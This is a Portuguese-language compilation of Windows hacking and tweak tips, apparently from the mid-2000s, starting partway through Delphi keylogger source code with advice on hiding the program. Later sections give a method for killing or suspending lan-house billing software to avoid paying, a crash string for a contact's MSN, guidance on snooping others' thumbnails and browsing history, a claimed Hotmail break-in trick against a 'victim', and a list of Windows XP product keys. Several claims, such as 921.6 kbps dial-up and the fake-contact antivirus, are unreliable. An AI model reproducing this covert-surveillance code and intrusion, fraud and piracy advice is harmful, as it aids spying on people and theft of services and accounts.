106: Coloca(' [NUM *] '); 107: Coloca(' [NUM +] '); 109: Coloca(' [NUM -] '); 110: Coloca(' [NUM SEP. DECIMAL] '); 111: Coloca(' [NUM /] '); 112: Coloca(' [F1] '); 113: Coloca(' [F2] '); 114: Coloca(' [F3] '); 115: Coloca(' [F4] '); 116: Coloca(' [F5] '); 117: Coloca(' [F6] '); 118: Coloca(' [F7] '); 119: Coloca(' [F8] '); 120: Coloca(' [F9] '); 121: Coloca(' [F10] '); 122: Coloca(' [F11] '); 123: Coloca(' [F12] '); 144: Coloca(' [NUM LOCK] '); 186: Coloca('Ç'); 187: Coloca('='); 188: Coloca(','); 189: Coloca('-'); 190: Coloca('.'); 191: Coloca(';'); 192: Coloca(' [APÓSTROFO] '); 193: Coloca('/'); 194: Coloca(' [NUM PONTO] '); 219: Coloca('´'); 220: Coloca(']'); 221: Coloca('['); 222: Coloca('~'); 226: Coloca('\'); else if (KeyLoop >= 65) and (keyloop <= 90) then Coloca(Chr(keyloop)); if (keyloop >= 32) and (keyloop <= 63) then Coloca(Chr(keyloop)); //numpad keycodes if (keyloop >= 96) and (keyloop <= 110) then Coloca(Chr(keyloop)); end; end; //case; inc(keyloop); until keyloop = 255; end; ah sim, ia esquecendo.. coloque o interval do timer para "1"... senão ficará difícil captar neh.. rs e ++: é bom dxar o memo desabilitado (com a propriedade Enabled := False), pq se vc digitar nele, irá aparecer o q vc digitou naturalmente MAIS o q o Timer fica adicionando a ele, e ficará repedito e confuso.. Então... Rode o programa (tecle F9). Tecle qualquer coisa no teclado e observe! Isso funciona mesmo se sua janela não estiver ativa (digo, se estiver por trás das outras ou ocultas). Keylogger que se preze... Não fica em janela! Oculte-o como preferir, e salve o conteúdo do Memo onde quiser. Aí é com você... Dica: para ocultar o programa, digite Application.ShowMainForm := False, no código-fonte do projeto, depois do Application.Initialize e antes do Application.CreateForm... Mas aí você deverá ter criado um método para recuperar o que foi digitado, né?! Adapte o programa como você quiser, afinal aqui apenas mostrei como é possível capturar o que foi digitado. Lembre-se de que ele poderá ser fechado pelo Gerenciador de tarefas do Windows, através da guia "Processos". deixo claro que esse código realmente "funciona", eu testei e coloquei algumas coisas a mais. eh soh adaptar ao q vc quer fazer! UM KEYLOGGER PODE SER VISTO COMO UM PROGRAMA DO MAL, QUE COLETA DADOS DO USUÁRIO SEM O CONSENTIMENTO DESTE, E ENVIA AS INFORMAÇÕES COLETADAS PARA ALGUM HACKER OU PESSOA DO MAL. MAS ESSE MESMO KEYLOGGER PODE SER USADO PARA IDENTIFICAR O FUNCIONÁRIO QUE ZÔA NOS COMPUTADORES DA EMPRESA, PARA VER O QUE SUA FILHA DE 10 ANOS TECLA NO MSN, ETC. NOTE QUE PODE SER DE USO PROIBIDO EM ALGUNS PAÍSES. EM OUTROS, O MAIS COMUM, PARA SER CONSIDERADO UM SOFTWARE LEGAL ELE DEVE INFORMAR QUE O SISTEMA ESTÁ SENDO MONITORADO. EM EMPRESAS, POR EXEMPLO, OS FUNCIONÁRIOS DEVEM USAR OS COMPUTADORES PARA FINS DA EMPRESA, NUNCA COMO USO PESSOAL. ISSO DEVE SER DEIXADO BEM CLARO EM CONTRATO.

NÃO ME RESPONSABILIZO POR NADA QUE POSSA ACONTECER DEVIDO O USO DESTES CÓDIGOS AQUI APRESENTADOS. USE COM CONSCIÊNCIA E RESPONSABILIDADE, SEMPRE.

Quer renomear a lixeira!?!?
Por Nélio Jaloto Se você gostaria de renomear a Lixeira para outra coisa qualquer, como por exemplo SLU, Lixo, Trash ou qualquer outra coisa, cole o texto abaixo (destacado na cor cinza) num editor de textos (bloco de notas,editpad, ultraedit ou outro qualquer) e o salve no desktop como lixeira.reg (a extensão tem de ser reg, não txt). Dê dois cliques nele. O Windows vai perguntar se você deseja acionar a chave para o registro. Responda sim. Agora clique na Lixeira com o botão direito do mouse e você encontrará a opção para renomeá-la. Windows Registry Editor Version 5.00 "Attributes"=hex:50,01,00,20 "CallForAttributes"=dword:00000000

Quer Renomear a lixeira?Mais complicado mas é mas certo de conseguir!(pelo registro)
Por Nélio Jaloto Bom esse metodo é infalivel apesar que o outro acima nao é tambem mas para que ja tem uma certa pratica com editor de Registro esse vale mas apena.É vocês terao que ir na chave HKEY_USERS\S-1-5-21-1177238915-2139871995-725345543-1003\Software\Microsoft \Windows\ShellNoRoam\MUICache, depois de ter ido nesse caminho vocês terao que renomear que clikar dua vezes nessa sub-chave @C:\WINDOWS\system32\SHELL32.dll,-8964, vai aparecer outra janela onde em "dados do valor" você coloca o que você quiser ( no meu caso eu coloque P.M.T.R "prefeitura municipal de tres rios rsrsrsrsrs....)que si encontra do lado direito do editor de registro... Depois de ter feito isso Dica:você nao prescisa fazer logoff ou reiniciar a sua maquina para que carregue as novas configuraçao, é so você aperta CTRL + ALT + DEL onde vai aparecer o gerenciador de tarefa agora é so você ir na aba processo e finalizar o processo explorer.exe depois no proprio gerenciador é so você ir no menu arquivo "executar nova tarefa" agora ja vai carregar cpom as novas configuraçoes..valeu gente Agora eu estou na minha grande busca talvez nao seje grande para você mas eu estou procurando no editor de registro como editar o iniciar e colocar qualquer coisa que nem a minha primeira apostila mas agora pelo editor de registro Nessa mesma chave vocês irao encontrar muitas coisa legais,mas vai com calma nao sai por ai editando o registro por que o seu sistema pode nem mas ser carregado...

Documentos compartilhados

Por Nélio Jaloto Se você não está em uma rede e não deseja que a pasta Documentos Compartilhados apareça em Meu Computador, siga os seguintes passos para removê-la: Inicie o editor de registro. Na chave HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ clique com o botão direito do mouse num espaço vazio do lado direito e selecione Novo > Valor DWORD Nome do novo valor: NoSharedDocuments Dê dois cliques no novo valor e no campo Dados do Valor coloque 1. Feche o registro. Reinicie o Windows para que a mudança faça efeito. Se quiser voltar atrás, mude o valor para 0 no Value data ou apague NoSharedDocuments Value.

Seu pc reinicia sozinho?
Por Nélio Jaloto É padrão do Windows dar um reboot no seu computador quando encontra uma falha de sistema. Você pode impedir isso desabilitando o autoreboot. Edite o registro e localize HKEY_LOCAL_MACHINE\SYSTEM\CurrentControl\SetControl\CrashControl.Selecione AutoReboot na lista da direita. Dê dois cliques nele e troque o valor para 0 (zero) para desabilitar ou 1 para habilitar. Reinicie o computador. Também é possível solucionar o problema sem editar o registro. Abra o Painel de Controle, escolha Sistema, selecione Avançado e clique em Configurações no último tópico (inicialização e recuperação). Desmarque a opção Reiniciar automaticamente. Deixe marcada a opção Gravar um evento no log do sistema. Para ver porque o sistema teve alguma falha, digite "eventvwr" no prompt de comando ou no menu Iniciar>Executar.

Fazendo backup do WPA,para evitar reativaçao:
Por Nélio Jaloto Se você tiver o Window XP já ativado e funcionando corretamente em seu computador, pode ser que você necessite reinstalá-lo por algum motivo nesta mesma máquina. Neste caso, você terá reativá-lo novamente para que ele funcione como original etc.... Para evitar isso, simplesmente faça um backup (cópia) de um arquivo do WPA e depois de reinstalar o Windows, copie este arquivo para o lugar correspondente. Com isso,ele estará automaticamente ativado. Para isso, copie para um disquete pen drive etc,o arquivo WPA.DBL que está em Windows System32. Após a reinstalação do Windows XP,coloque o arquivo neste mesmo diretório e ação está terminada. Vale dizer que o arquivo WPA.DBL é onde o sistema armazena as informações sobre o hardware instalado no computador

Strings você conhece?
Por Nélio Jaloto Éssa é a primeira apostila criar esse tipo de assunto para aceleraçao de modem,entao ,o software configura modem para um melhor

desempenho.Entao quer dizer que eu posso conectar mais rapido na net nélio?Claro eu estou disponibilizando algums codigos ali em baixo tem modem que aceita e tem uns que nao varia de marca mas a maioria funcionam Com vários tipos de strings para modems e configurações, as configurações do modem speed estipulam para o windows dar o máximo de transferência de dados, as strings são para corrigir problemas de conexão. O que pode melhorar e muito a performance de seu modem.

O Que São Strings ?
Strings são sequencias de comandos que programam o modem para determinadas funções. Elas são muito procuradas para resolver problema,mas muitos usuarios comum desconhece!

STRINGS GENÉRICAS
AT&FS15=128 ats15=128 conexões. S6=n ou 3 segundos) atx313 modem não faz som. AT&F1&C1&DO&K3S15=128 ats35=10 atx3s10=50 S15=128 AT&F%C0\N\V4 S10=255 AT&F1 ATX3 X3 ou X4 ou X0 ATZ ATX0 erro:629 ) AT&FX3 (robotics) Problemas de conexão. (robotics) Serve especificamente para conexões congelas mas vem dando resultado em problemas de (robotics) Onde n é o numero de segundos que o modem espera pelo sinal antes de discar.(ideal colocar 2 Cria o som da discagem e o handshake, em alguns casos funciona para problemas de conexão que o (padrão V90) Conexão congelada genérica. Conexão congelada genérica. Esta é beleza. Conecta e navega!!! Conexão congelada genérica. Conexão congelada genérica (Motorola V.34 ou ==> Conexão congelada Motorola Lifestyle ou outro Motorola V.34***Em teste*** ). Segura a conexão, onde 255 é o tempo de desconexão da portadora. Restaura as configurações de fábrica e utiliza correção de erro por hardware. (é a mesma coisa que X3 a diferença é que se usa ATX3 em modem mais antigo) força a discagem. Força a discagem. Carrega as configurações previamente salvas na Deixa o modem com as configurações padrão (para modem travado também é bom ou constantemente Inicializa a discagem

AT&FX4 Inicializa o software (em modem HSP's vai forçar o modem a utilizar o processador da maquina. É bom quando não conecta mesmo!). AT&FX4 AT&F Em modems que possuem chipset próprio eu desconheço a função Restaura as configurações de fábrica.

Strings Mais Usadas
Modelo de Modem
Hsp 56 Micromodem Hsp (Qualquer Modelo) Hsp 56 MR Motorola SM 56 Agere System PCI Soft Modem Neto Dragon US Robotics

String Adequada
+MS=V34,0 AT&FE1V1X4&C1&D2 +MS=V34,0 AT+MS=V34 AT&FX&C1&D2 AT+MS=34 S32=98

Funcionalidade
Para problemas de Conexao e Navegação Para problemas de Navegação, Para problemas de Conexão e Navegação, Para problemas de Conexão e Navegação, Para problemas de Conexão e Navegação, Para problemas de Conexão e Navegação, Para problemas de Conexão.

recomendo)
Por Nélio Jaloto

Conexão discada à 921,6Kbps (uso e

Ai pessoal quem usa conexão discada e está cansado dos atuais 46Kbps (que as vezes nem sabe que velocidade vai conectar as vezes ater pior) e quer uma coiasa melhor é só colocar este código nas propriedades avançadas do modem como segue o exemplo abaixo!!! AT&FX&C1&D2+MS=V34 Tem que ser tudo em maiúscula. Primeiro vocês deverao ir em painel de controle:

Depois clik em opçoes de telefone e modem: clikando la ira abrir outra janela onde você tera que clikar na aba "modems" depois la em baixo "propriedade",ira abrir outra janela entao clik na aba "avançadas" vai ter um campo onde vocês deverao colocar o string que AT&FX&C1&D2+MS=V34 tudo em letra maiuscula!!!

Depois de ter feito isso vao para area de trabalho sua e clik no icone de discagem (aquele que disca para o provedor),clikem em "propriedade" conforme a figura abaixo,vai aparecer outra janela,depois na mesma aba "geral" voce clik em "configurar...",outra janela se abrira nessa janela voce vai ver um campo onde pode selecionar a velocidade máxima do modem em "bps" entao é so voce colocar na máxima que tiver do seu modem. Obs: varia a velociade máxima do modem depende do fabricante!

Agora você tera uma conexao discada com velocidade de 921,6kbps é claro que nao é uma velociade real mas é a forma em que os dados sao recebidos assim acelerando o modem e dando uma aparecia que voce esta rapido.E o legal que é sempre nao tem hora ruim de tarde de noite,de manha etc... Dica:Baixem o firefox uns dos meus navegador mais preferido nao tem erro ele é muito melhor que o IE.Quando voce tiver adiquirido ele baixem um complemento para ele que vai parecer que voce esta em banda larga (nao é tanto,mais tambem nao é muito menos é isso mesmo) fica muito melhor procurem la no site do baixaki (http://www.baixaki.com.br) por fasterfox Atenção:Parece que quando fazem isso o Windows fica mais lerdo para identificar o sinal do provedor,assim demorando mais a se conectar na internet!

Process Explorer monitorar processos running(Programa)
Por Nélio Jaloto Nossa avaliação: 5 estrelas(uso e recomendo) O explorador Process mostra-o que a informação sobre que segura e os processos de DLLs abriram ou carregaram. A exposição Process do explorador consiste em dois sub-windows. O alto mostra sempre uma lista dos processos atualmente ativos, incluindo os nomes de seus clientes possuindo, visto que a informação indicada na janela inferior depende da modalidade que o explorador Process está em: se estiver no youll da modalidade do punho ver os punhos que o processo selecionado na janela superior abriu; se o explorador Process estiver no youll da modalidade do DLL ver o DLLs e as limas memória-traçadas que o processo carregou. O explorador Process tem também uma potencialidade poderosa da busca que lhe mostre rapidamente que processos têm os punhos particulares abertos ou o DLLs carregado. Explorador Process do Download Freeware Fonte:site da empresa

Travando tempo na Lan House!!!
Por Nélio Jaloto Acabei de ver isso e achei interessante!!! Baixe o Process Explorer do site http:// www.snapfiles.com/get/processexplorer.html ou em portugues é so ir nesse link ai http://www.mediafire.com/?7xhh8ydfxv4 e inicie na máquina da lan house (não é nescessário a instalação). Bom porque geralmente os gerenciador de lan bloqueia esse tipo de coisa. Após o Process Explorer começar, procure pelo processo do software(genrenciador de lan house) que acaba com sua diverção, normalmente está tarjado com uma cor roxa(nao é sempre). Se haver mais de um processo em roxo, clik com o butao direito em cima do processo e depois em kill process three (árvore). Após selecionado clique com o botão direito e selecione KILL PROCESS ou SUSPEND. Ele tambem pause o programa como si fosse uma musica que legal em.É so cilkar em SUSPEND Dica:ele tambem tem uma funçao muito util que fica no menu view opacity,onde você pode colocar ele trasparente,opaco,com varios tipos de trasparencia em porcentagem vai do maior para o menor para você ir vendo com cuidado si voce colocar ele em 10% fica bem trasparente mesmo e nao pode enxergalo ele de longe,pessoas normais nao podem enxergalo rsrsrs...

Imagem do programa Process Explorer(ai eu estava usando ele um pouco invisivel acho que estava a 60%nao tenho certeza)Mais o Nélio o seu esta em portugues?Entao esse ai eu mesmo traduzi ele mas nao é aquelas coisa so algumas coisa que da para fasilitar a vida do usuarios si voce quiser o programa quase em portugues é so clikar ai nesse link http://www.mediafire.com/?7xhh8ydfxv4

Alguns softwares de lans houses possuem um sistema se segurança que quando o processo for finalizado, ele trancará o computador. Use a lan house em dias movimentados, pois o administrador (se não for burro) pode notar que tem um computador sendo usado mas no cliente do software mostra ele como livre...Use SUSPEND para garantir que não vai haver os erros acima mensionado. Ah sim! Seja discreto... não saia contando para todo mundo que você sabe como ir na lan de graça! O administrador pode notar e cortar o barato de poder localizar processos no computador.

"Ação e reação"

Antivirus muito útil: sua cabeça!!!
TRUQUE: ANTI VÍRUS MUITO ÚTIL por sua cabeça!!!
Falei isso na primeira apostila e vou falar de novo acho bem interesante isso,e tambem acho legal ir crescendo podendo ate ficar extintos alguma virus etc... Então experimente usar a seguinte técnica: 1- Abra a sua agenda de contactos e faça um "click" em "novo contato", como se estivesse adicionando um contato novo. 2- Na janela onde escreverá o novo nome, ponha "A A A A". (Ou qualquer outro nome com vários "As" no início para ter certeza de que será o primeiro contato da sua lista) (Eu uso AAALERTA DE VÍRUS!!!!) 3- Crie uma endereço de e-mail falso como por exemplo: aaaaaaaaa@aaaaa.com Explicando : Desta forma o nome designado como A A A A, com o endereço acima, ficará como a entrada n° 1 da sua agenda. Será ali que os vírus começarão o seu esforço para se autoenviarem a todos os outros contatos relacionados por ordem alfabética da sua agenda. É óbvio que será impossível entregar a mensagem no falso endereço criado. Quando a primeira tentativa falha (coisa que se sucederá por causa da falso endereço), o vírus não continua e os componentes da agenda não serão infectados. Além disto, a segunda vantagem deste método, é que, se um e-mail contaminado não pode ser entregue, será notificado na sua caixa de e-mail quase imediatamente. Portanto, ao receber um aviso que diz que uma mensagem sua para "AAAA" não pôde ser entregue, saberá de forma rápida que tem um vírus instalado no seu computador. Se todos nós usássemos este sistema tão simples, e até banal, os atuais virus não poderiam se propagar tão facilmente e o número de computadores infectados diminuiria drasticamente.

Pela facilidade de se fazer o procedimento acima, envie esta mensagem para o maior números de amigos que puder para que, todos possam aprender e evitar os aborrecimentos atuais que enfrentamos quando acessamos a internet.

Trave o msn de algum contato seu!!!
Por Nélio Jaloto Com um papo qualquer ( voce vaio ter quer ser bom! )convensa seu contato a colar esse código na mensagem pessoal dele: f… R¨¦g½Áƒ½ÙÙãõ ´ÈÂì" 917ú#aC^w w‹@z–– ²Á ,se contato dele ficar offline parabéns, ele "Nunca" ( Sim entre aspas )mais vai entrar no msn dele!!, vai dar uma mensagem de erro, e xau msn! ATENÇAO:Nao é pra você colar na sua mensagem pessoal, mas sim pedir pro seu contato colar na dele!!!Na verdade o que da paul mesmo é o programa do msn que foi instalado no pc da pessoal mas si ela for para outro computador (na lan house por ex)nao vai ter esse problema...

O que o Windows guarda na pasta "System Volume Information"? Ela fica protegida... Mas dá pra fuçar!
por Marcos Elias Explorando Rapidinho... Vc tem curiosidade em saber o q o Windows guarda na pasta "System Volume Information", que fica em cada unidade NTFS, oculta??? Pois bem, ele não deixa acessá-la, devido as permissões de arquivos. Faça isso, como administrador... Nas opções de pasta, desmarque a ocultação dos arquivos ocultos E de sistema protegidos (não somente os ocultos comuns). Feito isso, vá na raiz de uma partição NTFS, e acesse as propriedades da pasta "System Voluem Information". Se você der um duplo clique, ele dirá "Acesso negado". É que ela vem com permissões de acesso apenas para o sistema, e não para os administradores. Na guia "Segurança" da tela das propriedades da pasta, clique em Adicionar, e digite Admnistrador (ou o nome da conta com direitos administrativos, pode ser o nome do grupo: "Administradores", no Windows em português). Veja:

Nota: para que a guia "Segurança" seja exibida no XP, o item "Usar compartilhamento simples de arquivo (recomendável)" deve estar desmarcado, nas opções de pasta. Ele muda a tela das propriedades dos arquivos, "simplificando" para os usuários iniciantes, mas escondendo opções mais avançadas - que são exibidas diretamente no Windows 2000; eis um dos resultados da domesticalização do NT. Dê OK. Na outra tela, marque o item "Controle total" da coluna "Permitir", para os administradores (ou para a conta/grupo que você acabou de adicionar). Então dê Aplicar e OK novamente. Agora é só entrar na pasta! Nota: você poderia adicionar permissões para qualquer usuário, não somente os administradores. Porém, é preciso acesso como administrador para poder alterar as permissões. Cuidado, não mexa no conteúdo dessa pasta, só curie - sem alterar ou remover os arquivos. Temo que possa ocorrer perda de arquivos, informações do índice da tabela de arquivos, dos recursos do NTFS, etc. Além de ser uma pasta inicialmente protegida, o nome "Informações de Volume do Sistema" parece ser algo muito importante. Fuce por sua conta e risco!

Vasculhe arquivos de logs do Windows em busca de informações úteis ou alheias, com o Windows File Analyzer!!!
por Marcos Elias Pra galerinha que gosta de curiar as coisas alheias... Um bom programinha: WFA, "Windows File Analyzer". Baixe em: http://www.mitec.cz O que ele faz? Algumas poucas coisas, que valem por grandes:

Vasculhar as miniaturas dos arquivos "Thumbs.db"
Ele identifica, exibe e permite salvar as miniaturas das imagens armazenadas nos arquivos "Thumbs.db", do Windows. Quando você exibe imagens em miniaturas, por padrão, o Windows grava as miniaturas no arquivo "Thumbs.db", para exibição rápida posterior, sem ter que ler imagem por imagem e redimensioná-las. Porém... Ao apagar os arquivos das imagens, eles não são apagados diretamente do cache das miniaturas. O WFA permite ver as miniaturas e salváe você gosta de curiar, pode sair copiando o arquivo Thumbs.db de computadores alheios (como escolas, lan houses...) e depois, em casa, vê e aprecia as miniaturas. Mesmo que as imagens originais não existam mais!

Análise dos pré-carregadores (Prefetches)
Analisa os arquivos de Prefetch do Windows (como aqueles da pasta \windows\Prefetch). Basicamente mostra o arquivo, a data de criação, a data do último acesso, o número de execuções, entre outras informações. Convenhamos, isso não serve pra praticamente nada para a maioria dos usuários (é um recurso avançado e específico).

Análise de atalhos
Quase inútil, mostra os atalhos de uma pasta, o caminho, a data de criação, de último acesso... Apesar de "quase inútil", pode ser bom se você quiser saber quando um atalho foi usado pela última vez.

Análise do histórico do IE, cookies, etc
O IE guarda o histórico na forma de atalhos, mas mantém informações importantes no arquivo "index.dat". Pesquise por todos os arquivos de nome "Index.dat", incluindo ocultos e de sistema, na sua pasta de usuário ( \ Documents and settings \ Seu Nome). E então veja quanta informação "sigilosa" que você achou que tinha apagado ou limpado, pode ser descoberta. Maldito Windows, que não deixa claro essa política de privacidade!!! Mesmo que você limpe o histórico, os endereços de alguns sites poderão ser encontrados no Index.dat.

Análise dos arquivos da lixeira
O Windows guarda a lixeira numa pasta "RECYCLER", que fica oculta (você pode encontrá-la nas raízes das unidades, usando outros sistemas operacionais, como o Linux, ou o próprio Explorer, desde que a exibição de todos os arquivos ocultos e de sistema esteja configurada nas opções de pasta). O WFA pode mostrar algumas informações sobre o conteúdo da lixeira também. Enfim... O WFA pode ser útil e comprometedor, revelando dados que não deveriam ficar assim expostos. O usuário apaga uma imagem que salvou numa lan house, temporariamente, por exemplo, para passar da sua câmera digital para a Internet. Depois ele apaga a foto, mas o filho da mãe do Windows deixa a miniatura dela. A qualidade pode não ser boa, mas dá para identificar pessoas, especialmente em fotos comprometedoras. Aproveito para deixar uma crítica ao Windows e ao Tio Bill. E nossa privacidade, onde entra??? O Contrato de Licença de Usuário Final (EULA) não diz nada sobre isso...

Algumas dicaszinhas do msn e por ultimo invasao de e-mail (pela hotmail)!!!
Por Nélio Jaloto O MSN Messenger é um dos softwares de mensagens instantâneas mais utilizados no mundo e é o favorito no Brasil. A versão utilizada aqui é a 7.5 em português do Brasil. 1 Importe e exporte listas de contatos Se você quer manter uma cópia de sua lista de contatos ou quer compartilhá-la com alguém, vá ao menu Contatos e clique em Salvar lista de contatos. Escolha uma pasta e o MSN Messenger salvará a lista em um arquivo de extensão .ctt. Para usar este arquivo ou para adicionar a lista de contatos que um amigo lhe enviou, basta ir em Contatos e escolher Importar Lista de Contatos de um Arquivo. 2 Saiba pelo histórico quem já conversou com você No MSN é possível participar de conversas com mais de uma pessoa, mesmo que algumas delas não estejam em sua lista. Para isso, vá em Arquivo e clique em Exibir histórico de mensagens. Lá aparecerá o e-mail de cada pessoa que já conversou com você (clique no e-mail para ver o histórico de mensagens trocadas). Esse recurso é especialmente útil para quando você exclui acidentalmente o contato de alguém, mas não lembra exatamente o e-mail do MSN da pessoa. 3 Permita mensagens somente de quem estiver em sua lista Se você quer que somente pessoas que estão em sua lista lhe enviem mensagens, vá em Ferramentas / Opções / Privacidade e marque o item Somente as pessoas da minha Lista de Permissões podem ver meu status e enviar mensagens para mim. 4 Saiba quem te adicionou Para ter certeza de quem te adicionou, vá em Ferramentas / Opções / Privacidade e clique no botão Exibir (ou Ver, de acordo com a versão de seu software). Aparecerá uma lista que mostra todas as pessoas que tem você em sua lista. 5 Coloque imagens personalizadas como fundo Você pode colocar a imagem que quiser como plano de fundo para suas conversas no MSN. Para isso, vá em Ferramentas / Meus Planos de Fundo e clique em Procurar. Procure a figura desejada na janela que surgir e clique em Abrir. Feito isso, a imagem selecionada vai ser listada. Marque-a e clique em Definir Padrão. 6 Cuidado com links e arquivos Há vírus e spywares que usam o MSN Messenger para se espalhar. Por isso, tenha atenção ao seguinte:

- Se receber uma mensagem com um link de alguém que você não conhece, ignore; - Se durante uma conversa seu contato enviar-lhe um mensagem com um link não esperado, não clique nele imediatamente. Antes, pergunte sobre o que se trata. Se a pessoa responder que não enviou link algum, é sinal de que algum vírus ou programa malicioso está usando o MSN dela; - Ao receber arquivos, principalmente de pessoas pouco conhecidas, faça o MSN Messenger checá-los através de um antivírus. Para isso, vá em Ferramentas / Opções / Transferência de Arquivo e marque a caixa Verificar vírus nos arquivos usando:. Em Procurar, procure pelo executável de seu antivírus. 7 Salve suas conversas Teve uma conversa muito interessante ou importante e deseja guardá-la? Para isso não é necessário copiar todo o conteúdo do bate-papo e editá-lo em um processador de textos. Simplesmente faça o seguinte: na janela da conversa, vá em Arquivo e clique em Salvar. Se a conversa continuar, clique novamente em Salvar ao terminá-la. O MSN Messenger salvará a conversa em um arquivo no formato Rich Text Format (extensão .rtf), preservando inclusive a formatação. 8 Use o MSN Messenger sem instalá-lo Se você estiver usando um computador que não tenha o MSN Messenger e não possa/queira instalá-lo, é possível usar a versão Web do programa. Nela, a conversa acontece em uma janela de seu navegador Web. Para usufruir desse serviço, simplesmente acesse a página webmessenger.msn.com e faça login. 9 Mande mensagens para vários contatos ao mesmo tempo Quer avisar seus contatos de uma festa ou de um site legal que achou na internet? Em vez de enviar uma mensagem para cada contato, envie uma única mensagem para todos de uma vez. Para isso, vá em Ações e clique em Enviar Mensagem Instantânea. Na janela que abrir, pressione a tecla Ctrl e, sem soltar, clique uma vez com o botão esquerdo do mouse em cada contato a ser notificado. Para selecionar intervalos de contatos, faça o mesmo, porém com a tecla Shift do teclado. 10 invadindo E-Mail dos outros (tem que estar na mesma rede"lan house cursinho etc...") Consiga o username da vitíma ( Geralmente fica no campo de endereço"e-mail" ).Então digite " www.hotmail.com/cgibin/start/usernamedavitíma " .Você entrou.Esta técnica só funciona se você estiver na mesma rede ou computador que a vitíma esta, e a vitíma não devera estar em log out

key da microsoft!!!
Por Nélio Jaloto No primeiro livro meu eu ensinei a passar o o windows de pirata para original mas la so tinha um serial (o que eu usava)entao agora eu estou disponibilizando varios serial (nunca textei mas pode ser que algum de nao é)

FCGKW-RHQQ2-YXRKT-8TG6W-2B7Q8 BX6HT-MDJKW-H2J4X-BX67W-TVVFG CDWVP-GBJRG-PDJRG-YGCMB-HCGG3 RK7J8-2PGYQ-P47VV-V6PMB-F6XPQ RBDC9-VTRC8-D7972-J97JY-PRVMG RJPBQ-76B6V-HDFJY-3BRR3-9DBXW E7G7A-XEM0Q-SD1FW-E15S7-BELMN TFCKG-MY9T6-9DWY2-9WB3B-G8Q7D JJWKH-7M9R8-26VM4-FX8CC-GDPD8 KR2X8-M8MGV-FQBRR-322YQ-QPM2Y BXCTM-R899Y-QH8H8-26PXH-BMC7B BQJG2-2MJT7-H7F6K-XW98B-4HQRQ CMGRR-XCBMG-4P8TB-DR9FW-62PFB HMTWJ-VPPWP-9BXP8-WD73Y-GGT6M KWQ2C-4GPMH-FTRMR-7JQGD-688TT DMGW7-3XBTD-3VV7C-83RQD-KHX66 M9W3X-RJD63-2WFRH-72X6G-HXD36 4QF63-CQ234-JMFXK-3CDDG-Q66JG 8FK2M-383CY-MWD7F-G2K8Y-R6HTK MJTT4-XFP6F-WGRWQ-XV2CR-34G9J XXPBP-7WD34-TTJH8-KGDRD-DFJR7 3V3QM-C6GQG-QK2FC-JTBP8-M6KDM WH23V-T24RF-C8GH8-GHDFJ-BXJYF 6PKKK-BPVHM-722FT-M82TW-GR7XC 8Y6DR-PK3XY-FHVJ2-HKQ8T-MDBM6 PX6QC-4KCKF-BC2QT-HHVJ6-YVCDR HQMHY-FX63M-KGTGH-HP8PW-DJX34 YPW48-RWTBQ-4JR62-WRPG2-GD6GM HB8BG-R6KCG-YYJFP-KTJ7D-B9GJY YMC8V-BFX4W-WGTPJ-8H8VR-YPRTC 2VF2C-W4Y8R-YBTDX-JJVKR-GM2XQ YQVDH-TD3QY-YVBXC-MW7T6-HTHPT QRPBC-D8W8P-P2WDC-KD8FG-D2DBQ 3VV32-X2YTF-Y4X3D-FYFY8-QXCD7 74R6B-RDYXV-837FG-W7W3Y-KX3V3

Como salvar vídeos do YouTube!

(tópico revisto e ampliado em 2006-09-12) Uma eu e um amigo (e, certamente, muuuuuita gente) estávamos procurando há poucas semanas... Por algum meio de salvar vídeos do YouTube. E na Info (setembro/2006) veio como a primeira mensagem na seção "Correio Livre", de cartas/e-mails dos leitores... Vi a revista logo no primeiro dia do mês... Caiu como uma luva!!! O leitor Daniel dos Santos (SP) indicou o programa VDownloader. Realmente é muito bom!!! Basta indicar a URL do link do vídeo no YouTube (a mesma URL que você usaria para entrar pelo seu navegador) e clicar em "Download"; ele converte para MPG ou AVI. Maravilhoso!!! Sem problemas com o formato .flv, que depois deveriaDe quebra, pode salvar e converter vídeos do Google Video ou do Grinvi também.

Procure por VDownloader na Internet ou baixe-o pelo link na página da Info: www.info.abril.com.br/download/4639.shtml ou http://www.baixaki.com.br Ah e não precisa instalar, é um executável apenas (pelo menos até a versão 0.2). Dica: se seu computador não for muito potente em termos de processador, converta para AVI ao ser questionado. A conversão para mpg/mpeg gera arquivos menores, mas é mais demorada. Espero que o YouTube não proteja os vídeos de outra forma... No orkut, por exemplo, alguns sites de terceiros permitiam enviar recados para todos os amigos da sua lista de uma só vez. Depois de um tempo, a galerinha do orkut colocou verificação de palavras dependendo do número de scraps enviados... Para evitar "spam" e abusos. E os programas automáticos se ferraram. Donos do "Seu tubo", pleeeease não façam nada parecido! E se você "ainda" não conhece o YouTube, fica a dica, www.youtube.com. Um site que permite a qualquer um publicar vídeos... E compartilhá-los, gratuitamente.

Códigos JavaScript que eu uso e gosto :)!!!
por Marcos Elias Para quem tem site ou blog... E mexe com HTML, Javascript, etc... Deixarei aqui pequenos scripts que uso no meu dia-a-dia, em vários sites ou blogs que tenho. Use o que lhe for útil :) É bom também pois evita que outros sites adicionem barras no topo do seu site, quando exibido por um link deles. Mensagem na barra de status, com o texto do título da página Simples: <script language=javascript> window.defaultStatus = document.title; </script> Isso exibe na barra de status o mesmo conteúdo que estiver entre as tags <title> e </title>. Se você quiser um texto fixo, troque "document.title" pelo texto desejado, não se esqueça de colocar entre aspas (eu prefiro as aspas simples). Ficaria: window.defaultStatus = 'Qualquer texto aqui'; Cuidado com o "S" em maiúscula, em "defaultStatus", visto que o JavaScript é case sensitive, ou seja, faz distinção entre maiúsculas e minúsculas. Redirecionador Quando uma página muda de endereço, é bom colocar um redirecionamento. O que eu mais uso é em JavaScript: <script language="JavaScript"> top.location = 'http://www.explorando.cjb.net'; </script> Ele é melhor do que o META HTTP REFRESH porque é executado beeem mais rápido. De preferência, coloque logo no começo das páginas. É bom também para evitar que curiosos fucem suas pastas sem a página index, por exemplo, pastas onde você só guarda imagens ou arquivos, especialmente arquivos importantes. Aí você cria um simples index.htm nessa pasta, com o código de

